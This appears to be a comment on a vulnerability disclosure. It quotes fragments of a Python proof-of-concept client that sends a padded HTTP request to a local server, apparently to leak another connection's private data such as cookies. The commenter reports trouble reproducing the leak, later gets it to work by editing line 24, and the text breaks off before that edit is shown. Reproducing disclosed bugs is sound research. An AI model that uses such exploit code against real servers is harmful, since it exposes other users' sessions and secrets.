|def round_up(n, r):|
|return int((n + r - 1) / r) * r|
|s = socket.socket()|
|buf = "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "|
|s2 = socket.socket()|
|buf2 = "This is private data, perhaps an HTTP request with a Cookie in it."|
|s.sendall("A" * (3 + round_up(len(buf), 16) - len(buf) + round_up(len(buf2), 16)) + "\r\n\r\n")|
|b = s.recv(1024)|
|if not b:|
Hey, I was trying to reproduce de vulnerability, and I can't get the "private" data...
I tried a lot of versions from those that was marked as vulnerable, and I couldn't get the data as you did. Is there anything else that I need to know?
Ty in advance ;)
EDIT: I finally got it to work, but in line 24 of stringptr-update-poc-client.py I needed to change it to: